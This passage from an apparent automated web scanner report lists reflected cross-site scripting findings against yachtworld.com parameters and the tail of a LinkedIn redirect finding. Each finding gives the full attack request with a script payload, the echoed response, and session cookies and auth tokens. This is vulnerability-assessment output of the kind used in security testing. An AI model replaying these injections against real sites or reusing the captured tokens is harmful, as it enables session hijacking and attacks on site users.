Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a42198c; bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; JSESSIONID="ajax:2350077440714366421"; leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296155990:5ed64d4d5f57e19d1092d1eaf1f4a8bd26dd7b76"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Z8AO-20Khh1K0OWjw5zaBBzxLBaEbMVjxTAWV7kKsG1Zr1YspMYdVT:1296157810:2b1512b33861e588d824862ae46734c91e6073f9"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:20:09 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 990
Date: Thu, 27 Jan 2011 19:50:10 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:20:19 GMT;path=/;httponly

<!DOCTYPE html>
<html>
<head title="Redirecting...">
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="pagekey" content="external_redirect" />
<style type="
...[SNIP]...
<script type="text/javascript">window.location.replace('http://www.linkedin.com/secureb47a6'-alert(1)-'f2583992d5c/login');</script>
...[SNIP]...

3.85. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 30b6e><script>alert(1)</script>9e5aaf9f068 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:51 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater30b6e><scr
...[SNIP]...
<a href=/core/listing/video_gallery.jsp?boat_id=1558604&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&&ywo=bluewater&&ybw= onClick="return popup(this, 'notes')">
...[SNIP]...

3.86. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 5ada6--><script>alert(1)</script>b8852678aaf was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater5ada6--><script>alert(1)</script>b8852678aaf&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 21:00:03 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>b8852678aaf/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater5ada6-->
...[SNIP]...

3.87. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload c9ea6<script>alert(1)</script>74d178365e9 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewaterc9ea6<script>alert(1)</script>74d178365e9&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:56 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 62732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>alert(1)</script>74d178365e9/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>
...[SNIP]...

3.88. http://www.yachtworld.com/bluewater/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/bluewater/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 925d7"><script>alert(1)</script>61a123d4d1a was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bluewater/email.cgi?url=bluewater&office_id=7582925d7"><script>alert(1)</script>61a123d4d1a&boat_id=2061801&hosturl=bluewater&&ywo=bluewater&&includeNav=true HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%